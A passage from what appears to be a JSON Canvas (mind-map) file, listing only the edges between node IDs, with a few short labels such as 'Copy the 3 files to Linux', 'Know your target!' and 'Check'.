		{"id":"917ce893c0aef95e","fromNode":"d34592e1e3f2c9b7","fromSide":"right","toNode":"391a62e24fe8e811","toSide":"left"},
		{"id":"bc647fd16ac1c327","fromNode":"391a62e24fe8e811","fromSide":"right","toNode":"5912e00a3c6fc6f5","toSide":"left"},
		{"id":"0d8ab6403c136ef0","fromNode":"59f8e0be6f6e9228","fromSide":"right","toNode":"8a2b3d30e048537c","toSide":"left"},
		{"id":"53e9e7badad7c0a5","fromNode":"59f8e0be6f6e9228","fromSide":"right","toNode":"556d952ab9cacda9","toSide":"left"},
		{"id":"019bf29e067fc3a7","fromNode":"fd7956c7d78f40bc","fromSide":"right","toNode":"051cfffaf1c1df5c","toSide":"left"},
		{"id":"14d587bc0d25ea96","fromNode":"f7302f756d758a08","fromSide":"right","toNode":"1b5878317be2d465","toSide":"left"},
		{"id":"d99fe609ecd361b6","fromNode":"8a2b3d30e048537c","fromSide":"right","toNode":"04d2acacfe4b2082","toSide":"left"},
		{"id":"454c9cc1372d3961","fromNode":"556d952ab9cacda9","fromSide":"right","toNode":"724d5f72cc196b36","toSide":"left"},
		{"id":"8b45f2c3e0cc58f6","fromNode":"051cfffaf1c1df5c","fromSide":"right","toNode":"2e7081f599c2e1b1","toSide":"left"},
		{"id":"0eb2e49d7e953acf","fromNode":"59f8e0be6f6e9228","fromSide":"right","toNode":"fd7956c7d78f40bc","toSide":"left"},
		{"id":"792666b122749cb5","fromNode":"59f8e0be6f6e9228","fromSide":"right","toNode":"f7302f756d758a08","toSide":"left"},
		{"id":"400f62bb89388090","fromNode":"f7302f756d758a08","fromSide":"right","toNode":"f7745bf4151bac9c","toSide":"left"},
		{"id":"4de54d77fe532efc","fromNode":"f7302f756d758a08","fromSide":"right","toNode":"c205b1e0a9e609f3","toSide":"left"},
		{"id":"3426266f6b3f94db","fromNode":"c205b1e0a9e609f3","fromSide":"right","toNode":"d3bba7b1711bee8b","toSide":"left"},
		{"id":"6aaaf9735b917cbc","fromNode":"1b5878317be2d465","fromSide":"right","toNode":"f7d0e61b28f87676","toSide":"left"},
		{"id":"b4287a8ce98cf55c","fromNode":"f7745bf4151bac9c","fromSide":"right","toNode":"df3276c2cdff6138","toSide":"left"},
		{"id":"c8f8fdbb6622b85b","fromNode":"f7745bf4151bac9c","fromSide":"right","toNode":"0fca41865f0fd62f","toSide":"left"},
		{"id":"78472cb090a9d9bf","fromNode":"0fca41865f0fd62f","fromSide":"bottom","toNode":"d69c6ffce62987a7","toSide":"top"},
		{"id":"d5f4d1d626fa2dc1","fromNode":"d69c6ffce62987a7","fromSide":"bottom","toNode":"7d90c3d1654839b5","toSide":"top"},
		{"id":"177d948fb38730ec","fromNode":"7d90c3d1654839b5","fromSide":"bottom","toNode":"df3276c2cdff6138","toSide":"top","label":"Copy the 3 files to Linux"},
		{"id":"ddd825b37aa95042","fromNode":"724d5f72cc196b36","fromSide":"right","toNode":"152a49a41762d498","toSide":"left"},
		{"id":"dad055421c23398e","fromNode":"724d5f72cc196b36","fromSide":"right","toNode":"4ac55e284b87b4f8","toSide":"left"},
		{"id":"f42e8e1e3fddfcc6","fromNode":"556d952ab9cacda9","fromSide":"right","toNode":"b8adcae143efb2f4","toSide":"left"},
		{"id":"dbeeff7ddeb383af","fromNode":"b8adcae143efb2f4","fromSide":"right","toNode":"a5051450222b434c","toSide":"left"},
		{"id":"a35ba3f2239a120f","fromNode":"556d952ab9cacda9","fromSide":"right","toNode":"d7f652a6ac9cc425","toSide":"left"},
		{"id":"2ffab62b8975a7dc","fromNode":"d7f652a6ac9cc425","fromSide":"right","toNode":"a3ba6b2d55cb6970","toSide":"left"},
		{"id":"a63c803bcfdc3715","fromNode":"556d952ab9cacda9","fromSide":"right","toNode":"18474b3bbfedcf6b","toSide":"left"},
		{"id":"89f2f95e9d3c8d38","fromNode":"18474b3bbfedcf6b","fromSide":"right","toNode":"6ac891e8c34ec0db","toSide":"left"},
		{"id":"a0741c13b058e071","fromNode":"6ac891e8c34ec0db","fromSide":"right","toNode":"359958f41ce64b65","toSide":"left"},
		{"id":"fd7a03a643ae324c","fromNode":"04d2acacfe4b2082","fromSide":"right","toNode":"40cc0d12228587d5","toSide":"left"},
		{"id":"32351560241e420c","fromNode":"40cc0d12228587d5","fromSide":"right","toNode":"0f1d427b1c1b5763","toSide":"left"},
		{"id":"de11c6b6b75cc28d","fromNode":"04d2acacfe4b2082","fromSide":"right","toNode":"c0ae3801019d702a","toSide":"left"},
		{"id":"e9d938a041afb276","fromNode":"04d2acacfe4b2082","fromSide":"right","toNode":"ec927226eabf13af","toSide":"left"},
		{"id":"d19152ee0dfe7836","fromNode":"04d2acacfe4b2082","fromSide":"right","toNode":"6a51163c7d5339c6","toSide":"left"},
		{"id":"403dd939b1f0057f","fromNode":"6a51163c7d5339c6","fromSide":"right","toNode":"da18d1a10f0865c3","toSide":"left"},
		{"id":"caf8bfc24d5fb9e2","fromNode":"c0ae3801019d702a","fromSide":"right","toNode":"e3a7513df0fcfaa7","toSide":"left"},
		{"id":"5f32f950a49d4f18","fromNode":"ec927226eabf13af","fromSide":"right","toNode":"e3dca26307ac0931","toSide":"left"},
		{"id":"d39a9f8fbcbdbcc4","fromNode":"f5cee6bb422bd4de","fromSide":"right","toNode":"2dd756717238c21c","toSide":"left","label":"Know your target!"},
		{"id":"194fc060e98e0060","fromNode":"9ee76002e08886f7","fromSide":"right","toNode":"d26ab937343b0f07","toSide":"left"},
		{"id":"e04bd6e404b563a5","fromNode":"d26ab937343b0f07","fromSide":"bottom","toNode":"eaacb8a3f9c78f68","toSide":"top"},
		{"id":"42da1701e7ed5539","fromNode":"9b8fae862b7ec0ce","fromSide":"right","toNode":"59294c93cdca22bb","toSide":"left"},
		{"id":"b1054bcd1c93b7a0","fromNode":"9b8fae862b7ec0ce","fromSide":"right","toNode":"08cf2172b00bc8cc","toSide":"left"},
		{"id":"0c67b3cadb3ec9c0","fromNode":"3f3428d75be63f23","fromSide":"right","toNode":"9b8fae862b7ec0ce","toSide":"left"},
		{"id":"4d4c9ee4e11e5783","fromNode":"59294c93cdca22bb","fromSide":"right","toNode":"98d497bd6d458fe0","toSide":"left"},
		{"id":"ecf2bb951c82efa8","fromNode":"59294c93cdca22bb","fromSide":"right","toNode":"337c9cd874758dff","toSide":"left"},
		{"id":"1510b0b25ae73690","fromNode":"08cf2172b00bc8cc","fromSide":"right","toNode":"83a08a88a63e48b8","toSide":"left"},
		{"id":"0a4a2890c04ceb72","fromNode":"0073f0c4e8080e37","fromSide":"right","toNode":"d7375bf32a4c97fc","toSide":"left"},
		{"id":"9c0b564a6da2b2d8","fromNode":"0073f0c4e8080e37","fromSide":"right","toNode":"bdc41abcb8951aba","toSide":"left"},
		{"id":"cc372f66a3eb9a5e","fromNode":"3f3428d75be63f23","fromSide":"right","toNode":"0073f0c4e8080e37","toSide":"left"},
		{"id":"1b8640a3c306c7a6","fromNode":"d7375bf32a4c97fc","fromSide":"right","toNode":"2ebb0aea5a71e8d9","toSide":"left"},
		{"id":"b6b0ef4e1d4e46f7","fromNode":"2ebb0aea5a71e8d9","fromSide":"right","toNode":"3dbe75f6427616ff","toSide":"left"},
		{"id":"8c0f625fa23d754e","fromNode":"bdc41abcb8951aba","fromSide":"right","toNode":"fe2c75c1d27cf8ad","toSide":"left"},
		{"id":"96fda5d00be09c92","fromNode":"bdc41abcb8951aba","fromSide":"right","toNode":"1992ed91c6a6b684","toSide":"left"},
		{"id":"ead6058a993312e1","fromNode":"fe2c75c1d27cf8ad","fromSide":"right","toNode":"44082a95492a3b97","toSide":"left"},
		{"id":"dec3d854ce693eae","fromNode":"fe2c75c1d27cf8ad","fromSide":"right","toNode":"ca25072ea352d459","toSide":"left"},
		{"id":"e60d3f7f49d68a8a","fromNode":"fe2c75c1d27cf8ad","fromSide":"right","toNode":"a1244da42c960691","toSide":"left"},
		{"id":"6b31931b905a6439","fromNode":"fe2c75c1d27cf8ad","fromSide":"right","toNode":"6dabce3518062f1c","toSide":"left"},
		{"id":"7f4d21eb8eec895b","fromNode":"44082a95492a3b97","fromSide":"right","toNode":"ff473589e5e02407","toSide":"left"},
		{"id":"aef25c813bfcdaa3","fromNode":"a1244da42c960691","fromSide":"right","toNode":"ff473589e5e02407","toSide":"bottom"},
		{"id":"5ffdfc907bc817a0","fromNode":"ca25072ea352d459","fromSide":"right","toNode":"ff473589e5e02407","toSide":"bottom"},
		{"id":"e95da38c33136947","fromNode":"6dabce3518062f1c","fromSide":"right","toNode":"ff473589e5e02407","toSide":"bottom"},
		{"id":"8a56fd4220d41f53","fromNode":"1992ed91c6a6b684","fromSide":"right","toNode":"0726edfb28732be0","toSide":"left"},
		{"id":"7512c6008ecaf574","fromNode":"ff473589e5e02407","fromSide":"top","toNode":"0726edfb28732be0","toSide":"right","label":"Check"}
	]
}